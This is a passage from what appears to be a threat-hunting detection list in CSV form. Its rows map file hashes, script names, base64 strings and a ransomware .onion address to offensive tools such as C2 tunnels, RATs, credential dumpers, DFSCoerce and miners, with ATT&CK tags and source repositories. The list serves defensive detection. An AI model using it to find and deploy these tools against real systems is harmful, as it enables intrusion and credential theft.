"*df35838ff39fcb2ec8c8783b4485abe8b7cd805bad795caf730e6886e48655a1*",".{0,1000}df35838ff39fcb2ec8c8783b4485abe8b7cd805bad795caf730e6886e48655a1.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","40805"
"*df3adfbca15691d22d9dd17b3247e1ef434b0b85863ce1e6900565cdbf8b1cd4*",".{0,1000}df3adfbca15691d22d9dd17b3247e1ef434b0b85863ce1e6900565cdbf8b1cd4.{0,1000}","offensive_tool_keyword","lolminer","NVIDIA+AMD GPU Miner","T1496","TA0040","N/A","N/A","Cryptomining","https://github.com/Lolliedieb/lolMiner-releases","1","0","#filehash","N/A","9","10","2781","601","2025-02-01T20:03:57Z","2018-10-27T20:35:03Z","40808"
"*df3f055a2fe6f5b84cc062ba3576864810034bf5e5f04235356374b6e725f8bc*",".{0,1000}df3f055a2fe6f5b84cc062ba3576864810034bf5e5f04235356374b6e725f8bc.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","40809"
"*df4c83b6cc9b95717ed255abc28211a8f50db90f6b963c19c12e02bfce81c5ef*",".{0,1000}df4c83b6cc9b95717ed255abc28211a8f50db90f6b963c19c12e02bfce81c5ef.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40810"
"*df6296b27eb1e94fd1fbf0508d4ae9aaabd000598e2e5dc89c4b2928db7ba301*",".{0,1000}df6296b27eb1e94fd1fbf0508d4ae9aaabd000598e2e5dc89c4b2928db7ba301.{0,1000}","offensive_tool_keyword","venom","Venom - A Multi-hop Proxy for Penetration Testers","T1090","TA0005 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Dliv3/Venom","1","0","#filehash","N/A","10","10","2070","357","2022-05-11T03:13:20Z","2019-01-13T07:35:29Z","40814"
"*df64eaddeb2763b35b10a754df7492a2d305fdd8873d847e271e48c6ede05783*",".{0,1000}df64eaddeb2763b35b10a754df7492a2d305fdd8873d847e271e48c6ede05783.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40816"
"*df660a53e3b5d5aeaab189dedd61587a2d1215ad808f444333f230719e715b8d*",".{0,1000}df660a53e3b5d5aeaab189dedd61587a2d1215ad808f444333f230719e715b8d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","40817"
"*df68fb1553a6d135354adb6d2cc68ea5b0b63569e8d2c6bf5659869cf94ae4cc*",".{0,1000}df68fb1553a6d135354adb6d2cc68ea5b0b63569e8d2c6bf5659869cf94ae4cc.{0,1000}","offensive_tool_keyword","Carseat","Python implementation of GhostPack Seatbelt situational awareness tool","T1012 - T1082 - T1087 - T1124 - T1217","TA0006 - TA0007 - TA0009","N/A","N/A","Collection","https://github.com/0xthirteen/Carseat","1","0","#filehash","N/A","8","3","257","21","2024-11-12T19:37:38Z","2024-11-08T02:08:53Z","40818"
"*df6b380384faa29656ef09665f3ce25b350fb22712230f0abd8a79739218db15*",".{0,1000}df6b380384faa29656ef09665f3ce25b350fb22712230f0abd8a79739218db15.{0,1000}","offensive_tool_keyword","DRSAT","Disconnected RSAT is a launcher for the official Group Policy Manager - Certificate Authority and Certificate Templates snap-in to bypass the domain joined requirement that is needed when using the official MMC snap-in. The tool works by injecting a C# library into MMC that will hook the various API calls to trick MMC into believing that the logged on user is a domain user. attackers can abuse Disconnected RSAT to interact with Active Directory (AD) environments from non-domain-joined machines","T1559.001 - T1112 - T1078 - T1134.002 - T1055.001","TA0002 - TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/CCob/DRSAT","1","0","#filehash","N/A","6","3","233","25","2024-12-27T11:44:18Z","2024-09-04T16:35:02Z","40819"
"*df715721574b532f4f6afea2a3864a11d7d2ce94872267f640d688a34d0d0625*",".{0,1000}df715721574b532f4f6afea2a3864a11d7d2ce94872267f640d688a34d0d0625.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","40820"
"*df73e65ae951cedb5ed162e7a32b7e361820b61c051bfe852017e5acc66e79f0*",".{0,1000}df73e65ae951cedb5ed162e7a32b7e361820b61c051bfe852017e5acc66e79f0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40822"
"*df78d4f9127039231844797c38428df24a80bd49eb11a5ee9a4dcf43f31573a9*",".{0,1000}df78d4f9127039231844797c38428df24a80bd49eb11a5ee9a4dcf43f31573a9.{0,1000}","offensive_tool_keyword","Discord-RAT-2.0","Discord Remote Administration Tool fully written in c#, stub size of ~75kb with over 40 post exploitations modules","T1059.005 - T1105 - T1569.002 - T1027.001","TA0011 - TA0003 - TA0006 - TA0009 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/moom825/Discord-RAT-2.0","1","0","#filehash","N/A","10","10","512","115","2023-11-03T01:15:38Z","2022-07-15T20:09:56Z","40823"
"*df8687a87b12b4cfcd9cad7082ed7c92bb43726b0d026aeeae6efd575539c0e8*",".{0,1000}df8687a87b12b4cfcd9cad7082ed7c92bb43726b0d026aeeae6efd575539c0e8.{0,1000}","offensive_tool_keyword","creddump7","extracts various forms of credentials from Windows systems","T1003 - T1081 - T1040 - T1110 - T1555","TA0006 - TA0009","N/A","Sandworm","Credential Access","https://github.com/CiscoCXSecurity/creddump7","1","0","#filehash","N/A","10","4","394","106","2020-10-02T13:25:16Z","2014-06-24T13:18:38Z","40825"
"*df8ef60e1804137b954c9ca3f896887789d33fcf3c24ea31db30a18443370539*",".{0,1000}df8ef60e1804137b954c9ca3f896887789d33fcf3c24ea31db30a18443370539.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40827"
"*df95ba5fe88d5031a4f5dfbfc8cecc64f6fd0cbbd4a9b9248666344987a9619f*",".{0,1000}df95ba5fe88d5031a4f5dfbfc8cecc64f6fd0cbbd4a9b9248666344987a9619f.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","0","#filehash","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","40828"
"*df9860d2c8cecab1cdb3ea0367184c4e486ae8db5661784f94d5bed0736703e3*",".{0,1000}df9860d2c8cecab1cdb3ea0367184c4e486ae8db5661784f94d5bed0736703e3.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","40829"
"*dfa3434845774ae53b7a2b3396c31a7478f7fa8b1601b8b9f8600a647f7b492d*",".{0,1000}dfa3434845774ae53b7a2b3396c31a7478f7fa8b1601b8b9f8600a647f7b492d.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043  - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","40830"
"*dfb104a4f9541ef50c36e26d50379b2cfde93bb28bf1136aa84f917431bc2431*",".{0,1000}dfb104a4f9541ef50c36e26d50379b2cfde93bb28bf1136aa84f917431bc2431.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40831"
"*dfb60195257e88b1874fe4b859819a377898a3e3fa4fdaefb13010947c2b415a*",".{0,1000}dfb60195257e88b1874fe4b859819a377898a3e3fa4fdaefb13010947c2b415a.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40834"
"*dfb800d654e50937f2b2816724a0add4b35960bbc231f2a340a2fcebc53e9b46*",".{0,1000}dfb800d654e50937f2b2816724a0add4b35960bbc231f2a340a2fcebc53e9b46.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","40836"
"*dfbc5037fe0229e15f6f15775117aef5*",".{0,1000}dfbc5037fe0229e15f6f15775117aef5.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#filehash","N/A","10","10","6413","524","2025-04-08T17:44:12Z","2012-02-04T19:51:39Z","40837"
"*dfbff267e7b977012d3425c75caf46618b734284b26e9aab45cd5234e5f27240*",".{0,1000}dfbff267e7b977012d3425c75caf46618b734284b26e9aab45cd5234e5f27240.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40838"
"*dfce96a8631d54b7db3f4c222417d94fa131b7704c32cd431cdf6e04a945c1b2*",".{0,1000}dfce96a8631d54b7db3f4c222417d94fa131b7704c32cd431cdf6e04a945c1b2.{0,1000}","offensive_tool_keyword","File-Tunnel","Tunnel TCP connections through a file","T1071 - T1105 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","Lateral Movement","https://github.com/fiddyschmitt/File-Tunnel","1","0","#filehash","N/A","10","10","925","82","2025-04-19T15:06:09Z","2023-02-05T12:57:45Z","40840"
"*dfd2e8d943aab32e5988a886e6ed0a3bb36b5f5c3959fa3fb1281b6f524b16bb*",".{0,1000}dfd2e8d943aab32e5988a886e6ed0a3bb36b5f5c3959fa3fb1281b6f524b16bb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","#filehash","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","40842"
"*dfd462f0bce767096991d29d5f12e4e3230d63020da7dd0a56592ad96d1ddd58*",".{0,1000}dfd462f0bce767096991d29d5f12e4e3230d63020da7dd0a56592ad96d1ddd58.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","40843"
"*dfd9cfda010ae5c691fb4e5beb2d4dc409674852a0181c4d8c0a8ed5675ee226*",".{0,1000}dfd9cfda010ae5c691fb4e5beb2d4dc409674852a0181c4d8c0a8ed5675ee226.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","40845"
"*dfdb8a1bfa8b93e9c81e8682c57ad011d477ef756de6a97151415059b81f6270*",".{0,1000}dfdb8a1bfa8b93e9c81e8682c57ad011d477ef756de6a97151415059b81f6270.{0,1000}","offensive_tool_keyword","PSAmsi","PSAmsi is a tool for auditing and defeating AMSI signatures.","T1059.001 - T1562.001 - T1070.004","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/cobbr/PSAmsi","1","0","#filehash","N/A","7","4","390","74","2018-04-22T20:56:33Z","2017-09-22T11:48:47Z","40846"
"*dfeb2fa81380c29962c017cdb719bbcaf2aaca68b64001f2e242c75a46aa509f*",".{0,1000}dfeb2fa81380c29962c017cdb719bbcaf2aaca68b64001f2e242c75a46aa509f.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40848"
"*dff115f0040f56de9d8a11cbdd37e10d55ab03005f13dba0c3b35f66f17cb517*",".{0,1000}dff115f0040f56de9d8a11cbdd37e10d55ab03005f13dba0c3b35f66f17cb517.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","40850"
"*dff6778fd8f6791258e502599e48da824a019c9c64aa13316ee27be174333a1b*",".{0,1000}dff6778fd8f6791258e502599e48da824a019c9c64aa13316ee27be174333a1b.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40851"
"*DFFE7691BAC94B487B52667CEA436719BCCE3E84D0B47BF8191B52C4FC50063E*",".{0,1000}DFFE7691BAC94B487B52667CEA436719BCCE3E84D0B47BF8191B52C4FC50063E.{0,1000}","offensive_tool_keyword","Dispossessor","Dispossessor ransomware scripts and binaries","T1486 - T1489 - T1490 - T1107 - T1059 - T1001","TA0040 - TA0042","N/A","Dispossessor","Ransomware ","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","40855"
"*dfscoerce.py -d *",".{0,1000}dfscoerce\.py\s\-d\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","40857"
"*dfscoerce.py*",".{0,1000}dfscoerce\.py.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","Dispossessor","Exploitation tool","https://github.com/Wh04m1001/DFSCoerce","1","1","N/A","N/A","10","8","769","98","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z","40858"
"*dfscoerce_check*",".{0,1000}dfscoerce_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","40859"
"*DFSCoerce-main*",".{0,1000}DFSCoerce\-main.{0,1000}","offensive_tool_keyword","DFSCoerce","PoC for MS-DFSNM coerce authentication using NetrDfsRemoveStdRoot and NetrDfsAddStdRoot?","T1550.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","Dispossessor","Exploitation tool","https://github.com/Wh04m1001/DFSCoerce","1","0","N/A","N/A","10","8","769","98","2022-09-09T17:45:41Z","2022-06-18T12:38:37Z","40860"
"*dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l*",".{0,1000}dGhlU2VtaW5vbGVzYmVhdG5vcmVkYW1l.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40861"
"*dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM-*",".{0,1000}dGhlYnJvbmNvc2FyZWJldHRlcnRoYW5yYXZlbnM\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40862"
"*dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ--*",".{0,1000}dGhpc2lzYXRlc3RzdHJpbmdkb250Y2F0Y2htZQ\-\-.{0,1000}","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tool","https://github.com/FortyNorthSecurity/Egress-Assess","1","0","N/A","can be used for data exfiltration simulation","8","7","647","144","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z","40863"
"*dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk*",".{0,1000}dGlvbkhvbGRlcitEZWxlZ2F0ZUVudHJ5IlN5c3RlbS5EZWxlZ2F0ZVNlcmlhbGl6YXRpb25Ib2xk.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","#base64","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","40864"
"*dgnh6p5uq234zry7qx7bh73hj5ht3jqisgfet6s7j7uyas5i46xfdkyd.onion*",".{0,1000}dgnh6p5uq234zry7qx7bh73hj5ht3jqisgfet6s7j7uyas5i46xfdkyd\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","40865"
"*dhcp_sniffer.py*",".{0,1000}dhcp_sniffer\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","40868"
"*dhcp6.spoof.*",".{0,1000}dhcp6\.spoof\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 -  BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","40869"
"*Dialup/VPN Password Recovery*",".{0,1000}Dialup\/VPN\sPassword\sRecovery.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40870"
"*Dialup/VPN Passwords List*",".{0,1000}Dialup\/VPN\sPasswords\sList.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40871"
"*Dialupass.exe*",".{0,1000}Dialupass\.exe.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40872"
"*Dialupass.zip*",".{0,1000}Dialupass\.zip.{0,1000}","offensive_tool_keyword","dialupass","This utility enumerates all dialup/VPN entries on your computers. and displays their logon details: User Name. Password. and Domain. You can use it to recover a lost password of your Internet connection or VPN.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","BlackSuit - Royal - GoGoogle","Credential Access","https://www.nirsoft.net/utils/dialupass.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","40873"
"*Diamond RAT Builder.exe*",".{0,1000}Diamond\sRAT\sBuilder\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","40874"
"*Dictionary brute force attack on SSH services*",".{0,1000}Dictionary\sbrute\sforce\sattack\son\sSSH\sservices.{0,1000}","offensive_tool_keyword","SharpBruteForceSSH","simple SSH brute force tool ","T1110.003 - T1078","TA0006 ","N/A","N/A","Credential Access","https://github.com/HernanRodriguez1/SharpBruteForceSSH","1","0","N/A","N/A","9","1","60","10","2024-04-28T17:56:33Z","2024-04-25T20:06:05Z","40875"
"*dicts*generic-usernames.txt*",".{0,1000}dicts.{0,1000}generic\-usernames\.txt.{0,1000}","offensive_tool_keyword","spiderfoot","The OSINT Platform for Security Assessments","T1595 - T1595.002 - T1596 - T1591 - T1591.002","TA0043 ","N/A","N/A","Reconnaissance","https://www.spiderfoot.net/","1","0","N/A","N/A","6","10","N/A","N/A","N/A","N/A","40876"
"*dicts/ftp_pswd.txt*",".{0,1000}dicts\/ftp_pswd\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","40877"
"*dicts/ssh_default.txt*",".{0,1000}dicts\/ssh_default\.txt.{0,1000}","offensive_tool_keyword","scan4all","Official repository vuls Scan: 15000+PoCs - 23 kinds of application password crack - 7000+Web fingerprints - 146 protocols and 90000+ rules Port scanning - Fuzz - HW - awesome BugBounty","T1046 - T1210.001 - T1059 - T1082 - T1110","TA0007 - TA0001 - TA0009 - TA0002 - TA0004 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hktalent/scan4all","1","1","N/A","N/A","10","10","5655","679","2024-07-12T13:23:48Z","2022-06-20T03:11:08Z","40878"
